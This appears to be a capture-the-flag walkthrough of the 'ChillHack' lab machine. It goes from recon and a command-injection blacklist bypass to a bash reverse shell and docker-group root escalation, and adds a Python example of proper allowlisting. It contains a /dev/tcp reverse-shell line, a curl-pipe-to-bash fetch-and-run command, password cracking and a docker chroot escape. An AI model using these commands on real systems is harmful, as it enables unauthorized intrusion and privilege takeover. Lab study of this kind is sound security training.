ChillHack

Reconnaissance
Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):
nmap -Pn 10.10.161.202

Detailed Nmap Scan:
Command Breakdown:
(-sV): Service version detection
(-sC): Default nmap scripts
(-p): Specifying ports 21, 22 and 80
(-oN nmap): Saving the output to a file called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.161.202

Enumeration
Port 21: FTP
We see in the nmap scan that anonymous FTP login is allowed, so let's log in.
ftp 10.10.161.202

Listing the files, we see that there is a note.txt file, so let's transfer this file to our machine.
get note.txt

Let's read note.txt.

We have two usernames, Anurodh and Apaar; let's add them to our notes.

We also see that there is some filtering on the strings being passed to the command, which we might encounter while enumerating this machine further.
Port 80: HTTP
Let's visit the site.

Looks like a very well made website. Let's run gobuster to find hidden directories while we explore the webpage.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.161.202
I looked through the website and found nothing interesting in the source code either. After a while I got the results of the gobuster scan.

Let's visit this /secret directory.

Looks like we can execute commands, so let's try executing a basic command. When I tried executing ls, it gave me this.

Now, looking back at note.txt, it mentioned that there was filtering on the commands. To bypass that, I remembered a way: using backslashes in the command. Since we are not escaping any special characters, bash interprets the word exactly as it would without the backslash. Let's try l\s.

And it worked, so now let's check the index.php page, which will tell us what characters and words are being filtered.
c\at index.php
After executing the command, look at the source code.

We have a list of words that have been blacklisted, which means that we cannot use them on the system; we can also see the function that allows command injection. Let's now try to get a reverse shell on the machine.
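As an added example, not code from the original page or from the room, here is a Python model of the weak word blacklist that the walkthrough bypasses with a backslash, beside a check that normalizes the input the way bash does and an allowlist that avoids a shell entirely. The word list and the allowed command names are constructed assumptions; the real index.php is not reproduced.

```python
import shlex
import subprocess
from typing import Optional

# Constructed sample word list containing the words the walkthrough ran into;
# the real index.php blacklist is not reproduced here.
BLACKLIST = {"ls", "cat", "bash", "nc"}


def naive_filter_allows(cmd: str) -> bool:
    """The weak check: a word is blocked only if it appears verbatim in the
    raw input. bash removes unquoted backslashes and empty quotes before
    executing, so l\\s or c''at never match and still run as ls / cat."""
    return not any(word in BLACKLIST for word in cmd.split())


def normalized_filter_allows(cmd: str) -> bool:
    """Check the blacklist against the words bash would actually execute:
    shlex.split applies POSIX quote and backslash removal first.
    Still a blacklist, so variable expansion or $(...) are not covered."""
    try:
        words = shlex.split(cmd)
    except ValueError:          # unbalanced quotes: reject outright
        return False
    return not any(word in BLACKLIST for word in words)


# Allowlist: the actual fix. The user chooses a name, never a command line,
# and argv goes to subprocess without a shell, so backslashes, pipes and
# substitutions have nothing to act on. The names here are constructed.
ALLOWED = {"list": ["ls", "-la"], "date": ["date"]}


def run_allowlisted(name: str) -> Optional[str]:
    """Run one pre-approved argv, or return None for anything else."""
    argv = ALLOWED.get(name)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True).stdout
```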
Exploitation
First we create a bash reverse shell.
Second, we transfer it to the victim machine by starting an http server on our machine and using the curl command.
Finally, once the file is downloaded, we start a netcat listener and execute the file we transferred to get a reverse shell on the machine.
First we create a bash reverse shell called shell.sh:
bash -c "bash -i >& /dev/tcp/<your-ip>/1234 0>&1"
Now we start an http server:
python3 -m http.server 8000

Let's also start a netcat listener.
nc -lvnp 1234

Now we download the file on the victim machine using curl and then execute it with bash in the same command. We use a backslash in bash, as it has been blacklisted.
curl <your-ip>:8000/shell.sh | ba\sh
After executing the command, we get a reverse shell.

Let's now stabilize the shell.
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C

Privilege Escalation
Looking at the files on the system, we did not have permissions to read most of them, so let's run an automatic enumeration script called linpeas; you can find it on Google. Once you have downloaded it, we have to transfer it to this machine.

We already have an http server running; if you switched it off, start it up again.

Now we have to go to the /tmp directory, as we are not allowed to write files into other directories, and /tmp usually gives us permission to download files into it.
wget http://<your-ip>:8000/linpeas.sh

Before this, let's run sudo -l to see what we can run as other users.

Looks like we can run a script file, so let's read it.

Looking at the script, it appears to be vulnerable to command injection as there are no filters. This file is owned by Apaar, so we can try running it and executing a bash shell to get a bash instance as the user Apaar.
Let's first run the file and then type /bin/bash to get a shell as Apaar, then stabilize the shell.
sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'

We are now the user Apaar. We can read the user flag in Apaar's home directory.

Now I tried running linpeas but it did not work, so I had to find another way to escalate privileges, and that is when I found some interesting files in /var/www/files.

Let's read these files.
hacker.php

This looks like it is displaying an image file, and there is a message telling us that there might be something hidden in the image. Let's download this file, but before that let's explore the other files.
account.php

This looks like a login page.
index.php

In this file we see the credentials for the SQL database running on this machine.
Let's now download the image file we found in hacker.php; first, let's go to the directory in which the file is present.

Let's start an http server on this machine.
python3 -m http.server 8000

Now let's download the file onto our machine.
wget http://10.10.161.202:8000/hacker-with-laptop_23-2147985341.jpg

Now let's look at the file.

Let's use steghide to look for hidden information in the file. (Press Enter when prompted for the password.)
steghide info hacker-with-laptop_23-2147985341.jpg

We see a zip file, so let's extract it using steghide.
steghide --extract -sf hacker-with-laptop_23-2147985341.jpg

Let's unzip the zip file we got.
unzip backup.zip

Looks like we need a password; we can use zip2john and then John the Ripper to find the password.
zip2john backup.zip > hash

Now use john to crack the password.
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Now show the password.
john hash --show

We have the password. Let's unzip the file.
unzip backup.zip

Let's read the source_code.php file.

Looking through it, we find a base64 string that is the password for the user Anurodh. Let's decode the string.
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

We have the password; let's now log in through ssh.

We are now logged in. I looked around and did not see anything of interest until I ran the command id.
id

Anurodh is part of the docker group. We can find the command to become root on GTFOBins.

Let's run this command:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

We are now root.